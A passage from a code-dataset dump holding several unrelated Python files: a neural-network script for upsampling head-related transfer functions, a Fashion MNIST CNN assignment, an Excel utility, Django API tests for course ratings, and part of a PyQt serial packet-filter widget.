K\nimport logging \nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\nimport numpy as np\nfrom time import time as now\nfrom datetime import datetime\nimport scipy.optimize\nimport scipy.io as sio\nimport random\nDTYPE='float32' ## using float64 will result in slightly better results around 1~2 dB, but that will double the training time \ntf.keras.backend.set_floatx(DTYPE)\nfor ii in range(50): \n print(\">>>\")\n########################################################################################################################\n\n\n\n\n\n\n\n\n\n\n\n\n######################################################################################################################## \n### the definiton of the PINN model \n############################################################# \n### neural network initialization \ndef init_model(num_input=3, layers = 3, neurons=3): ## (x,y,z) input number is 3, layer number = depth L, neuron number = width W \n model = tf.keras.Sequential()\n model.add(tf.keras.Input(num_input)) ## input layer \n for ii in range(layers): ## hidden layers \n model.add(tf.keras.layers.Dense(neurons,activation=tf.keras.activations.get('tanh'),kernel_initializer='glorot_normal'))\n model.add(tf.keras.layers.Dense(1)) ## output layer \n return model\n############################################################# \n### calculate the PDE loss \ndef get_pde(model,pde_input,wave_num1):\n with tf.GradientTape(persistent=True) as tape:\n x1, x2, x3 = pde_input[:,0:1], pde_input[:,1:2], pde_input[:,2:3] # (x1,x2,x3) = (x,y,z) \n tape.watch(x1) ## notify tensorflow that we care about the gradient with respect to x1, x2, x3\n tape.watch(x2)\n tape.watch(x3)\n pde_pred = model(tf.stack([x1[:,0],x2[:,0],x3[:,0]],axis=1)) # mode prediction \n x1_d1 = tape.gradient(pde_pred,x1) ## first order gradient with respect to x, y, z\n x2_d1 = tape.gradient(pde_pred,x2)\n x3_d1 = tape.gradient(pde_pred,x3)\n x1_d2 = tape.gradient(x1_d1,x1) ## second order gradient with respect to x, y, z\n x2_d2 = tape.gradient(x2_d1,x2)\n x3_d2 = tape.gradient(x3_d1,x3)\n del tape\n Laplacian = ( x1_d2 + x2_d2 + x3_d2 )*wave_num1 ## wave_num1 = (1/(omega/c))^2, this normalize the laplacian \n loss_pde = tf.reduce_mean(tf.square(Laplacian + pde_pred)) ## this line of code calculate the PDE loss \n return loss_pde ## return the PDE loss \n#############################################################\n### calculate the data loss \ndef get_data(model,data_input,data_target): \n data_pred = model(data_input) ## mode prediction \n loss_data = tf.reduce_mean(tf.square(data_pred-data_target)) ## calcualte the difference between training data and the prediction, result in the data loss \n return loss_data ## return the data loss \n############################################################# \n### calculat the gradient with respect to the loss \ndef get_grad(model,data_input,data_target,pde_input,wave_num1):\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(model.trainable_variables)\n loss_data = get_data(model,data_input,data_target) ## data loss \n loss_pde = get_pde(model,pde_input,wave_num1) ## pde loss \n loss = loss_data + loss_pde ## total loss \n g = tape.gradient(loss,model.trainable_variables) ## take the gradient of the trainable parameters with respect to the loss\n del tape\n return loss_data, loss_pde, g ## return the data_loss, pde_loss, and the gradient \n############################################################# \n### predict the HRTF for the test_input coordiantes \ndef get_test(model,test_input):\n test_pred = model(test_input) ## model prediction \n return test_pred ## return the prediction \n##############################################################################################################\n\n\n\n\n\n\n\n########################################################################################################################\n# some global variables \nspeed = 343; # speed of sound \nlr = 1e-3; # adam learning rate \nnum_epochs = 100*1000; # training epoches \nlayers = 3 # PINN depth\n########################################################################################################################\n\n\n\n\n\n\n\n########################################################################################################################\n## this is the training process \nfor human in range(40,41): ## human denote the ID of subjects, iterative over subject 11 to 50 \n ################################################################################################################\n ### prepare the training data \n file = str(human)+'.mat' \n data = sio.loadmat(file);\n #######################################\n total_hrtf = data['total_hrtf']; ## known HRTF + unknown HRTF = total HRTF, \n ## total HRTF is a [7 , 2 , 1260] tensor\n ## 7 is the number of frequency bins of interest \n\n ## total_hrtf[ ff, 0, 0:1260] is the real part of total HRTF at frequency ff\n ## total_hrtf[ ff, 1, 0:1260] is the imag part of total HRTF at frequency ff\n\n ## total_hrtf[ ff, 0, 0:630] is the real and left part of total HRTF at frequency ff\n ## total_hrtf[ ff, 0, 0:630] is the real and right part of total HRTF at frequency ff\n ## total_hrtf[ ff, 1, 630:1260] is the imag and left part of total HRTF at frequency ff\n ## total_hrtf[ ff, 1, 630:1260] is the imag and right part of total HRTF at frequency ff\n\n total_est = np.copy(total_hrtf); ## a tensor the same size as total_hrtf, it will store the total_hrtf estimation\n\n\n train_hrtf = data['train_hrtf']; ## known HRTF only \n ## train HRTF is a [7 , 2 , 330] tensor\n ## 7 is the number of frequency bins of interest \n\n ## train_hrtf[ ff, 0, 0:330] is the real part of train HRTF at frequency ff\n ## train_hrtf[ ff, 1, 0:330] is the imag part of train HRTF at frequency ff\n\n ## train_hrtf[ ff, 0, 0:165] is the real and left part of train HRTF at frequency ff\n ## train_hrtf[ ff, 0, 0:165] is the real and right part of train HRTF at frequency ff\n ## train_hrtf[ ff, 1, 165:330] is the imag and left part of train HRTF at frequency ff\n ## train_hrtf[ ff, 1, 165:330] is the imag and right part of train HRTF at frequency ff\n\n\n\n total_coor = data['total_coor']; ## coordiantes of the known and unkown HRTFs \n ## total_coor is a [1260,8] tensor \n ## total_coor[ii,0:8] is the coordiantes of the ii-th hrtf \n ## total_coor[ii,0:3] = [x, y, z]\n ## total_coor[ii,3:6] = [r, theta, phi] in radian \n ## total_coor[ii,6:8] = [ theta, phi] in degree \n\n\n train_coor = data['train_coor']; ## coordiantes of the known HRTF only \n ## train_coor is a [330,8] tensor \n ## train_coor[ii,0:8] is the coordiantes of the ii-th hrtf \n ## train_coor[ii,0:3] = [x, y, z]\n ## train_coor[ii,3:6] = [r, theta, phi] in radian \n ## train_coor[ii,6:8] = [ theta, phi] in degree \n ########################################\n freq_bb = data['freq_bins']; ## vectors saved by matlab into mat format will be 2D arrays when read by python\n ## var[0] will get the value of the vector\n freq_bins = freq_bb[0] ## a vector of frequency bins we are going to evaluate \n ## [2.1 4.1 6.2 8.2 10.3 12.3 14.4] kHz \n ########################################\n total_num = data['total_num']; ## total number of known and unknown HRTFs = 1260 \n train_num = data['train_num']; ## number of known HRTF = 330 \n total_num = total_num[0][0] ## variables saved by matlab into mat format will be 2D arrays when read by python\n train_num = train_num[0][0] ## var[0][0] will get the value of the variable \n\n total_mid = total_num//2 ## total_hrtf[ ff, 0, 0:total_mid] real and left part of total hrtf \n ## total_hrtf[ ff, 0, total_mid:total_num] real and right part of total hrtf \n ## total_hrtf[ ff, 1, 0:total_mid] imagl and left part of total hrtf \n ## total_hrtf[ ff, 1, total_mid:total_num] imagl and right part of total hrtf \n\n\n train_mid = train_num//2 ## train_hrtf[ ff, 0, 0:train_mid] real and left part of train hrtf \n ## train_hrtf[ ff, 0, train_mid:train_num] real and right part of train hrtf \n ## train_hrtf[ ff, 1, 0:train_mid] imagl and left part of train hrtf \n ## train_hrtf[ ff, 1, train_mid:train_num] imagl and right part of train hrtf \n ################################################################################################################\n for ff in range(0,7): ## iterative over frequency \n ###############################\n ### the wave number \n freq = freq_bins[ff]; ## the current frequency \n wave_num = 2*np.pi*freq/speed; ## the wave number \n wave_num1 = 1.0/(wave_num**2); ## a factor used for normalizing the Laplacian \n ###############################\n ### the node number ## calculate the number of neurons in hidden layer according the frequency \n nodes = 0;\n if freq<3000: ## f<3000, neuron = f/500 \n nodes = int(np.ceil(freq/500));\n elif freq>6000:\n nodes = int(np.ceil(freq/1000)); ## f>6000, neuron = f/1000 \n else:\n nodes = 6; ## else neuron = 6 \n ##########################################################################################################################################\n for dd in range(4): ## 4 pinn methods to model the [real left], [real right], [imaginary left], [imaginar right] part of HRTF \n if dd==0: ## real left\n ####################################################################################################\n data_train = np.zeros((train_mid,1)); ### use the real and left known HRTF as training data \n xyz_train = np.zeros((train_mid,3)) ### the real and left known HRTF's cartesian coordinates \n xyz_total = np.zeros((total_mid,3)) ### the real and left [known + unknown] total HRTF's cartesian coordinates \n for ii in range(train_mid):\n data_train[ii,0] = train_hrtf[ff,0,ii] ### get the traning data \n xyz_train[ii,0:3] = train_coor[ii,0:3] ### and the corresponding coordinates \n for ii in range(total_mid):\n xyz_total[ii,0:3] = total_coor[ii,0:3] ### get the coordiantes used for PDE loss calculation \n ####################################################################################################\n elif dd==1: ## real right\n ####################################################################################################\n data_train = np.zeros((train_num-train_mid,1)); ### same as above but for the real and right part \n xyz_train = np.zeros((train_num-train_mid,3))\n xyz_total = np.zeros((total_num-total_mid,3))\n for ii in range(train_mid,train_num):\n data_train[ii-train_mid,0] = train_hrtf[ff,0,ii] \n xyz_train[ii-train_mid,0:3] = train_coor[ii,0:3] \n for ii in range(total_mid,total_num):\n xyz_total[ii-total_mid,0:3] = total_coor[ii,0:3] \n ####################################################################################################\n elif dd==2: ## imag left\n ####################################################################################################\n data_train = np.zeros((train_mid,1)); ### same as above but for the imaginary and left part \n xyz_train = np.zeros((train_mid,3))\n xyz_total = np.zeros((total_mid,3))\n for ii in range(train_mid):\n data_train[ii,0] = train_hrtf[ff,1,ii] \n xyz_train[ii,0:3] = train_coor[ii,0:3] \n for ii in range(total_mid):\n xyz_total[ii,0:3] = total_coor[ii,0:3] \n ####################################################################################################\n else: ## imag right\n ####################################################################################################\n data_train = np.zeros((train_num-train_mid,1)); ### same as above but for the imaginary and right part \n xyz_train = np.zeros((train_num-train_mid,3))\n xyz_total = np.zeros((total_num-total_mid,3))\n for ii in range(train_mid,train_num):\n data_train[ii-train_mid,0] = train_hrtf[ff,1,ii] \n xyz_train[ii-train_mid,0:3] = train_coor[ii,0:3] \n for ii in range(total_mid,total_num):\n xyz_total[ii-total_mid,0:3] = total_coor[ii,0:3] \n #########################################################################################################################################\n xyz_train = tf.convert_to_tensor(xyz_train, dtype=tf.float32) ### transfer the numpy data into tensorflow data, float32 format \n data_train = tf.convert_to_tensor(data_train, dtype=tf.float32)\n xyz_total = tf.convert_to_tensor(xyz_total, dtype=tf.float32)\n wave_num1 = tf.convert_to_tensor(wave_num1, dtype=tf.float32)\n #########################################################################################################################################\n ## the core training process \n now_err = 0 ### record the current data loss \n ### the PINN training is sensitive to network initialization, the training is repeated five times\n ### we select the training with the least data loss as the training result \n for cc in range(5): \n #####################################################################################################\n ### this line of code will clear the memory used by a model after it finish \n ### with out it, you will run out of memory quickly \n tf.keras.backend.clear_session() \n #####################################################################################################\n ### tell tensorflow to build up a static graph for the model_fit function \n ### the core model fitting/traning function \n @tf.function\n def model_fit(model,data_input,data_target,pde_input,wave_num1):\n loss_data,loss_pde,grad=get_grad(model,data_input,data_target,pde_input,wave_num1)\n optim.apply_gradients(zip(grad,model.trainable_variables))\n return loss_data, loss_pde\n #####################################################################################################\n model = init_model(3,layers,nodes) ## initialize a model with input number, hidden layer number, and nodes number \n optim = tf.keras.optimizers.legacy.Adam(learning_rate = lr) ### we use the ADAM optimizer\n db_true = 10*np.log10(tf.reduce_mean(tf.square(data_train)))/0.1/10 ### energy of the training HRTF in dB \n ##################################################################################################### \n ### let us train \n for jj in range(1,num_epochs):\n loss_data,loss_pde=model_fit(model,xyz_train,data_train,xyz_total,wave_num1)\n ##################################################################################################### \n loss_data_db = (10*np.log10(loss_data) - db_true)//0.1/10 ## the data loss \n loss_pde_db = 10*np.log10(loss_pde)//0.1/10 ## pde loss \n now = datetime.now() ## current date and time\n now = now.strftime(\"%H:%M:%S\")\n ## print data loss, pde loss, layer number, neuron number, for subject huamn at frequency ff\n print(ff,'ID',human,'T',now,'L',layers,'N',nodes,'R',dd,loss_data_db,loss_pde_db) \n #######################################################################################################\n ### if the current data loss is smaller \n if loss_data_db < now_err:\n #########################################################\n now_err = loss_data_db; ### store the data loss \n pinn_pred = get_test(model,xyz_total); ### predict the HRTF at [known + unknown] total HRTF coordinates \n pinn_pred = pinn_pred.numpy(); ### transfer the prediction into numpy format \n #########################################################\n if dd==0:\n for ii in range(total_mid): ### store the real left HRTF prediction into the total_est\n total_est[ff,0,ii] = pinn_pred[ii][0]\n elif dd==1: \n for ii in range(total_mid,total_num): ### store the real right HRTF prediction into the total_est\n total_est[ff,0,ii] = pinn_pred[ii-total_mid][0]\n elif dd==2:\n for ii in range(total_mid): ### store the imag left HRTF prediction into the total_est\n total_est[ff,1,ii] = pinn_pred[ii][0]\n else:\n for ii in range(total_mid,total_num): ### store the imag right HRTF prediction into the total_est\n total_est[ff,1,ii] = pinn_pred[ii-total_mid][0]\n #######################################################################################################\n ### good enough, stop \n if now_err<-29.0: ### if the current data loss is small enough, we do not repeat the training 5 times, stop it. \n break; \n print('------------------------------------------') \n ################################################################################################## \n ### save the result into a file \n newfile = str(human) + '_L' + str(layers) + '.mat' \n sio.savemat(newfile,{'total_hrtf':total_hrtf,'total_est':total_est,'total_coor':total_coor,'train_coor':train_coor}); \n #################################################################################################################### \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"feima1024/PINN-for-HRTF-upsampling","sub_path":"pinn.py","file_name":"pinn.py","file_ext":"py","file_size_in_byte":22602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21934786111","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ___\n# \n#

\"CLRSWY\"

\n# \n# ___\n\n#

Deep Learning

Assignment-2 (CNN)

Image Classification with CNN

\n\n# # Task and Dataset Info\n# \n# Welcome to second assignment of Deep learning lesson. Follow the instructions and complete the assignment.\n# \n# **Build an image classifier with Convolutional Neural Networks for the Fashion MNIST dataset. This data set includes 10 labels of different clothing types with 28 by 28 *grayscale* images. There is a training set of 60,000 images and 10,000 test images.**\n# \n# Label\tDescription\n# 0\t T-shirt/top\n# 1\t Trouser\n# 2\t Pullover\n# 3\t Dress\n# 4\t Coat\n# 5\t Sandal\n# 6\t Shirt\n# 7\t Sneaker\n# 8\t Bag\n# 9\t Ankle boot\n\n# # Import Libraries\n\n# In[1]:\n\n\ntry:\n import jupyter_black\n jupyter_black.load()\nexcept ImportError:\n print(\"You can safely ignore this message.\")\n\n\n# In[2]:\n\n\nimport os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"1\"\n\n\n# In[3]:\n\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.image import imread\nfrom tensorflow import keras\n\n# import warnings\n# warnings.filterwarnings(\"ignore\")\n# warnings.warn(\"this will not show\")\n\nplt.rcParams[\"figure.figsize\"] = (10, 6)\n\nsns.set_style(\"whitegrid\")\npd.set_option(\"display.float_format\", lambda x: \"%.3f\" % x)\n\n# Set it None to display all rows in the dataframe\n# pd.set_option('display.max_rows', None)\n\n# Set it to None to display all columns in the dataframe\npd.set_option(\"display.max_columns\", None)\n\n\n# In[4]:\n\n\nimport tensorflow as tf\n\nif tf.config.list_physical_devices(\"GPU\"):\n print(\"GPU support is enabled for this session.\")\nelse:\n print(\"CPU will be used for this session.\")\n\n\n# In[5]:\n\n\n# Set the seed using keras.utils.set_random_seed. This will set:\n# 1) `numpy` seed\n# 2) `tensorflow` random seed\n# 3) `python` random seed\nSEED = 42\nkeras.utils.set_random_seed(SEED)\n\n# This will make TensorFlow ops as deterministic as possible, but it will\n# affect the overall performance, so it's not enabled by default.\n# `enable_op_determinism()` is introduced in TensorFlow 2.9.\ntf.config.experimental.enable_op_determinism()\n\n\n# # Recognizing and Understanding Data\n# \n# **TASK 1: Run the code below to download the dataset using Keras.**\n\n# In[6]:\n\n\nfrom tensorflow.keras.datasets import fashion_mnist\n\n(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n\n# In[7]:\n\n\nprint(f\"There are {len(x_train)} images in the training dataset\")\nprint(f\"There are {len(x_test)} images in the test dataset\")\n\n\n# In[8]:\n\n\nx_train[5].shape\n\n\n# **TASK 2: Use matplotlib to view an image from the data set. It can be any image from the data set.**\n\n# In[9]:\n\n\nclasses=[\"T-shirt/top\", \"Trouser\",\"Pullover\",\"Dress\",\"Coat\",\"Sandal\",\"Shirt\",\"Sneaker\",\"Bag\",\"Ankle boot\"]\n\n\n# In[10]:\n\n\nimport matplotlib.pyplot as plt\n\n# Choose an image\nindex = 97 \n\n# Display the selected image along with its class name\nplt.figure()\nplt.imshow(x_train[index], cmap='gray')\nplt.title(f'Class: {classes[y_train[index]]}')\nplt.show()\n\n\n# # Data Preprocessing\n# \n# **TASK 3: Normalize the X train and X test data by dividing by the max value of the image arrays.**\n\n# In[11]:\n\n\nmax_pixel_value = np.max(x_train)\n\n# Normalize the data by dividing by the maximum pixel value\nx_train = x_train / max_pixel_value\nx_test = x_test / max_pixel_value\nmax_pixel_value\n\n\n# **Task 4: Reshape the X arrays to include a 4 dimension of the single channel. Similar to what we did for the numbers MNIST data set.**\n\n# In[12]:\n\n\n# Reshape the X arrays to include the single channel\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\nx_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\n\n\n# **TASK 5: Convert the y_train and y_test values to be one-hot encoded for categorical analysis by Keras.**\n\n# In[13]:\n\n\nfrom tensorflow.keras.utils import to_categorical\n\n\n# In[14]:\n\n\n# Convert y_train and y_test to one-hot encoded format\ny_train = to_categorical(y_train, num_classes=10) \ny_test = to_categorical(y_test, num_classes=10)\n\n\n# # Modeling\n\n# ## Create the model\n# \n# **TASK 5: Use Keras to create a model consisting of at least the following layers (but feel free to experiment):**\n# \n# * 2D Convolutional Layer, filters=28 and kernel_size=(3,3)\n# * Pooling Layer where pool_size = (2,2) strides=(1,1)\n# \n# * Flatten Layer\n# * Dense Layer (128 Neurons, but feel free to play around with this value), RELU activation\n# \n# * Final Dense Layer of 10 Neurons with a softmax activation\n# \n# **Then compile the model with these parameters: loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']**\n\n# In[15]:\n\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\n\n# Create the model\nmodel = Sequential()\n\n# 2D Convolutional Layer, filters=28 and kernel_size=(3,3)\nmodel.add(Conv2D(28, (3, 3), activation='relu', input_shape=(28, 28, 1)))\n\n# Pooling Layer where pool_size = (2,2) strides=(1,1)\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n# Flatten Layer\nmodel.add(Flatten())\n\n# Dense Layer with 128 neurons and ReLU activation\nmodel.add(Dense(128, activation='relu'))\n\n# Final Dense Layer of 10 Neurons with a softmax activation\nmodel.add(Dense(10, activation='softmax'))\n\n# Compile the model with the specified parameters\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n\n# ## Model Training \n# \n# **TASK 6: Train/Fit the model to the x_train set by using EarlyStop. Amount of epochs is up to you.**\n\n# In[16]:\n\n\nfrom tensorflow.keras.callbacks import EarlyStopping\n\n\n# In[17]:\n\n\nearly_stopping = EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)\n\n\n# In[18]:\n\n\nhistory = model.fit(x_train, y_train, epochs=50, validation_split=0.2, callbacks=[early_stopping])\n\n\n# **TASK 7: Plot values of metrics you used in your model.**\n\n# In[19]:\n\n\n# Get training and validation loss and accuracy\ntraining_loss = history.history['loss']\nvalidation_loss = history.history['val_loss']\ntraining_accuracy = history.history['accuracy']\nvalidation_accuracy = history.history['val_accuracy']\n\n# plot for the training and validation loss\nplt.figure(figsize=(12, 4))\nplt.subplot(1, 2, 1)\nplt.plot(training_loss, label='Training Loss')\nplt.plot(validation_loss, label='Validation Loss')\nplt.title('Training and Validation Loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\n# plot for the training and validation accuracy\nplt.subplot(1, 2, 2)\nplt.plot(training_accuracy, label='Training Accuracy')\nplt.plot(validation_accuracy, label='Validation Accuracy')\nplt.title('Training and Validation Accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\n\nplt.tight_layout()\nplt.show()\n\n\n# ## Model Evaluation\n# \n# **TASK 8: Show the accuracy,precision,recall,f1-score the model achieved on the x_test data set. Keep in mind, there are quite a few ways to do this, but we recommend following the same procedure we showed in the MNIST lecture.**\n\n# In[20]:\n\n\nfrom sklearn.metrics import classification_report\n\n\n# In[21]:\n\n\n# Predict the classes on the x_test data\ny_pred = model.predict(x_test)\n\n\n# In[22]:\n\n\n# Convert the one-hot encoded predictions to class labels\ny_pred_labels = np.argmax(y_pred, axis=1)\n\n\n# In[23]:\n\n\n# Convert one-hot encoded ground truth labels to class labels\ny_test_labels = np.argmax(y_test, axis=1)\n\n\n# In[24]:\n\n\n# Calculate the classification report\nreport = classification_report(y_test_labels, y_pred_labels)\n\nprint(report)\n\n\n# In[25]:\n\n\nunique, counts = np.unique(y_test_labels, return_counts=True)\n\n# Create a dictionary to display the count of data samples for each class\nclass_count = dict(zip(unique, counts))\n\n# Print the count of data samples for each class\nfor class_label, count in class_count.items():\n print(f\"Class {class_label}: {count} samples\")\n\n\n# ## Prediction\n\n# In[53]:\n\n\nnew_image = x_test[54]\n\n\n# In[54]:\n\n\nnew_image.shape\n\n\n# In[55]:\n\n\nplt.imshow(new_image)\nplt.show()\n\n\n# In[56]:\n\n\nimage_prediction = model.predict(new_image.reshape(1, 28, 28, 1))\n\n\n# In[57]:\n\n\npredicted_label = np.argmax(image_prediction)\n\n# Display the predicted class label\nprint(f\"Predicted Label: {classes[int(predicted_label)]}\")\n\n\n# # End of Assignment\n\n# ___\n# \n#

\"CLRSWY\"

\n# \n# ___\n","repo_name":"Brho0m/cnn","sub_path":"Image_Classification_with_CNN.py","file_name":"Image_Classification_with_CNN.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15107200274","text":"import xlrd\nimport xlwt\nimport openpyxl\nfrom config.setting import excel_path\nfrom config.setting import api_excel_path\n\nclass Excel_Opertion(object):\n \"\"\"excel表数据相关操作\"\"\"\n\n def __init__(self,ex_path=None,index=None):\n if ex_path == None:\n self.excel_path = excel_path # 默认excel文件路径\n else:\n self.excel_path = ex_path\n if index == None:\n index = 0\n self.data = xlrd.open_workbook(self.excel_path)\n self.table = self.data.sheets()[index] # sheets第一页数据\n\n # 获取excel数据,按照每行一个list,添加到一个大的list里面\n def get_data(self):\n result = []\n rows = self.get_lines()\n head=self.table.row_values(0)\n if rows !=None:\n for i in range(1,rows):\n row = self.table.row_values(i)\n # 过滤不执行的用例\n if row[-1] == 'F':continue\n result.append(dict(zip(head,row)))\n return result\n return None\n\n def api_get_data(self):\n result = []\n rows = self.get_lines()\n head=self.table.row_values(0)\n if rows !=None:\n for i in range(1,rows):\n row = self.table.row_values(i)\n # 将用例名称一一对应\n result.append(dict.fromkeys((row[0],),dict(zip(head[1:],row[1:]))))\n return result\n return None\n\n def api_update_data(self,row,column,eq):\n workbook = openpyxl.load_workbook(api_excel_path)\n worksheet = workbook.worksheets[0]\n worksheet.cell(row, column, eq)\n workbook.save(api_excel_path)\n\n # 获取excel行数\n def get_lines(self):\n rows = self.table.nrows # 获取行数\n if rows > 1:\n return rows\n return None\n\n\nif __name__ == '__main__':\n a=Excel_Opertion()\n a.api_update_data(1,2)","repo_name":"newcaolaing/web_auto","sub_path":"util/exl.py","file_name":"exl.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"74992301628","text":"from django.test import TestCase\nfrom django.shortcuts import reverse\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom tests.factories.course import CourseFactory\nfrom tests.factories.rating import RatingFactory\nfrom tests.factories.user import UserFactory\n\nfrom udemy.apps.course.models import CourseRelation\nfrom udemy.apps.rating.models import Rating\nfrom udemy.apps.rating.serializer import RatingSerializer\n\nRATING_LIST_URL = reverse('rating:rating-list')\n\n\ndef rating_detail_url(pk): return reverse('rating:rating-detail', kwargs={'pk': pk})\n\n\nclass TestRatingUnauthenticatedRequests(TestCase):\n \"\"\"Test unauthenticated API requests.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_rating_retrieve(self):\n rating = RatingFactory()\n\n response = self.client.get(rating_detail_url(pk=rating.id))\n\n serializer = RatingSerializer(rating)\n\n self.assertEqual(response.data, serializer.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_unauthenticated_cant_create_rating(self):\n response = self.client.post(RATING_LIST_URL)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass TestRatingAuthenticatedRequests(TestCase):\n \"\"\"Test authenticated API requests.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n self.user = UserFactory()\n self.client.force_authenticate(self.user)\n\n def test_rating_create(self):\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n\n payload = {\n 'course': course.id,\n 'rating': 3,\n 'comment': 'test',\n }\n\n response = self.client.post(RATING_LIST_URL, payload)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(Rating.objects.filter(id=response.data['id']).exists())\n\n def test_partial_rating_update(self):\n original_comment = 'original comment'\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n rating = RatingFactory(course=course, comment=original_comment, creator=self.user)\n\n payload = {\n 'rating': 3,\n }\n response = self.client.patch(rating_detail_url(pk=rating.id), payload)\n\n rating.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(rating.rating, payload['rating'])\n self.assertEqual(rating.comment, original_comment)\n\n def test_rating_full_update(self):\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n rating = RatingFactory(course=course, creator=self.user)\n\n payload = {\n 'rating': 3,\n 'comment': 'new comment',\n }\n response = self.client.put(rating_detail_url(pk=rating.id), payload)\n\n rating.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(rating.rating, payload['rating'])\n self.assertEqual(rating.comment, payload['comment'])\n\n def test_delete_rating(self):\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n rating = RatingFactory(course=course, creator=self.user)\n\n response = self.client.delete(rating_detail_url(pk=rating.id))\n\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Rating.objects.filter(id=rating.id).exists())\n\n","repo_name":"gabrielustosa/udemy-old","sub_path":"udemy/apps/rating/tests/test_rating_api.py","file_name":"test_rating_api.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36159858388","text":"from PyQt5.QtWidgets import QTableWidget, QTableWidgetItem, QWidget, QHBoxLayout, QVBoxLayout, QPushButton, QLineEdit, QSizePolicy\nfrom PyQt5.Qt import QFont, QItemSelectionModel\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QHeaderView\nimport Globals\nimport serial\nimport time\n\n## @package HardwareFilter\n# A widget that interacts with the microcontroller in order to\n# filter the packets controller-sided \n\n\n## The actual implementation of the HardwareFilter class\nclass HardwareFilter(QWidget):\n \n ## The constructor initialize superclass\n def __init__(self):\n super(HardwareFilter,self).__init__()\n self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))\n self.layoutingComplete = False\n self.setUi()\n\n ## Create the Widget-Layout\n def setUi(self):\n self.H1layout = QHBoxLayout()\n self.Vlayout = QVBoxLayout()\n \n self.searchInputField = QLineEdit()\n self.searchInputField.setPlaceholderText('Enter search term, then click search')\n self.searchButt = QPushButton('Search Table')\n self.saveFilterButt = QPushButton('Send filter to device')\n \n self.saveFilterButt.clicked.connect(self.saveFilter) \n self.searchButt.clicked.connect(lambda: self.searchInTable(self.searchInputField.text(),0))\n \n # Create Filter-Table\n self.filterTableIndex = 0\n self.filterTable = QTableWidget()\n self.filterTableItem = QTableWidgetItem()\n self.filterTable.setRowCount(0)\n self.filterTable.setColumnCount(2)\n \n self.filterTable.setHorizontalHeaderLabels('informationID;Enable'.split(';'))\n self.filterTable.resizeColumnsToContents()\n self.filterTableHeader = self.filterTable.horizontalHeader()\n self.filterTableHeader.setSectionResizeMode(0, QHeaderView.Stretch)\n self.filterTableHeader.setSectionResizeMode(1, QHeaderView.ResizeToContents) \n \n font = self.getFont()\n \n self.checkBoxAllIds = self.createCheckBox()\n self.filterTable.itemChanged.connect(self.filterAllIDs)\n self.checkBoxAllMessages = self.createCheckBox()\n \n # -- Add first Row for all -- #\n self.filterTable.insertRow(self.filterTableIndex)\n idFilterItem = QTableWidgetItem('FILTER ALL IDs')\n idFilterItem.setFont(font)\n self.filterTable.setItem(self.filterTableIndex,0,idFilterItem)\n self.filterTable.setItem(self.filterTableIndex,1,self.checkBoxAllIds)\n self.filterTableIndex = self.filterTableIndex + 1\n \n # -- Add informationID filter rows -- #\n for keys, values in Globals.tspDict.items():\n if values[0].startswith('ID'):\n checkBoxFilter = self.createCheckBox()\n self.filterTable.insertRow(self.filterTableIndex)\n self.filterTable.setItem(self.filterTableIndex,0,QTableWidgetItem(values[0]))\n self.filterTable.setItem(self.filterTableIndex,1,checkBoxFilter)\n self.filterTableIndex = self.filterTableIndex + 1 \n \n self.H1layout.addWidget(self.searchInputField)\n self.H1layout.addWidget(self.searchButt) \n self.Vlayout.addLayout(self.H1layout)\n self.Vlayout.addWidget(self.filterTable)\n self.Vlayout.addWidget(self.saveFilterButt)\n #------------------------------------ \n self.setLayout(self.Vlayout)\n self.layoutingComplete = True\n \n def searchInTable(self, textToSearch, column):\n tableModel = self.filterTable.model()\n start = tableModel.index(0, column)\n matches = tableModel.match(start, Qt.DisplayRole, textToSearch, 1, Qt.MatchContains)\n if matches:\n index = matches[0]\n self.filterTable.selectionModel().select(\n index, QItemSelectionModel.Select)\n self.filterTable.scrollToItem(self.filterTable.itemFromIndex(index))\n \n ## Sends a series of filter packets to the controller based on TSP specification and \n # the user inputs on the filterTable. 